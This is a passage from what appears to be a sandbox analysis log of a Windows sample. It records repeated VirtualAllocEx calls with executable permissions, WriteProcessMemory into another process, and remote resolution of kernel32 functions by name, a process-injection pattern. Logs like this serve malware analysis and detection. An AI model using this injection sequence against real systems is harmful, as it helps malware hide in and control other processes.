lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.568] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.568] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cde0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cde0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.568] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.569] ResetEvent (hEvent=0x580) returned 1 [0176.569] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.569] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.569] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.570] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.570] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.570] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.570] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.570] lstrlenA (lpString="GetFileSize") returned 11 [0176.570] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.570] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9faa*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9faa*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.571] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.572] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0176.572] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.572] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ce70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ce70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.572] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.573] ResetEvent (hEvent=0x580) returned 1 [0176.573] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.573] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.573] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.573] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0176.573] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.574] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.574] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.574] lstrlenA (lpString="GetCurrentProcessId") returned 19 [0176.574] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.574] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9fb8*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9fb8*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0176.575] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.575] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.576] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.576] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.576] ResetEvent (hEvent=0x580) returned 1 [0176.576] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.577] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.577] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.577] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.577] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.577] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.577] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.577] lstrlenA (lpString="SystemTimeToFileTime") returned 20 [0176.577] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.578] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9fce*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9fce*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0176.579] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0176.579] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.580] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ce70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ce70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.580] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.581] ResetEvent (hEvent=0x580) returned 1 [0176.581] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.581] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.581] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.581] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0176.581] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.581] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.582] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.582] lstrlenA (lpString="FreeLibrary") returned 11 [0176.582] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.582] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9fe6*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9fe6*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.583] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.583] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.584] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.584] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.585] ResetEvent (hEvent=0x580) returned 1 [0176.585] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.585] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.585] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.585] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.585] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.586] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.586] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.586] lstrlenA (lpString="WideCharToMultiByte") returned 19 [0176.586] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.586] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9ff4*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9ff4*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0176.587] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0176.587] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.587] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cb40*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cb40*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.588] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.588] ResetEvent (hEvent=0x580) returned 1 [0176.588] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.589] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.589] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.589] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0176.589] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.589] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.589] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.589] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23 [0176.589] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.590] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa00a*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa00a*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0176.591] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0176.591] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.592] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cb40*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cb40*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.592] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.593] ResetEvent (hEvent=0x580) returned 1 [0176.593] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.593] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.593] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.593] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0176.593] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.593] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.594] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.594] lstrlenA (lpString="GetSystemTime") returned 13 [0176.594] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.594] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa024*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa024*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0176.595] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.595] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.595] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.596] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.596] ResetEvent (hEvent=0x580) returned 1 [0176.596] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.597] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.597] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.597] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.597] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.597] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.597] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.597] lstrlenA (lpString="FormatMessageA") returned 14 [0176.597] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.598] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa034*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa034*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.599] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.599] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.599] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.600] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.600] ResetEvent (hEvent=0x580) returned 1 [0176.600] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.600] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.600] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.601] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.601] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.601] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.620] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.620] lstrlenA (lpString="CreateFileMappingW") returned 18 [0176.620] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.620] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa046*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa046*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0176.623] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ccc0 [0176.623] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.623] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ccc0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ccc0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.624] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.624] ResetEvent (hEvent=0x580) returned 1 [0176.624] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.625] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.625] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.625] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ccc0 | out: hHeap=0x2150000) returned 1 [0176.625] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.625] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.626] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.626] lstrlenA (lpString="MapViewOfFile") returned 13 [0176.626] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.626] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa05c*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa05c*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0176.627] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.627] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.628] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.628] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c510*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c510*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.628] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.629] ResetEvent (hEvent=0x580) returned 1 [0176.629] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.629] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.629] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.629] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.629] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.630] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.630] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.630] lstrlenA (lpString="QueryPerformanceCounter") returned 23 [0176.630] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.630] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa06c*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa06c*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0176.632] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.632] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ccc0 [0176.632] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.632] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ccc0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ccc0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.632] WriteProcessMemory (in: hProcess=0x5cc, 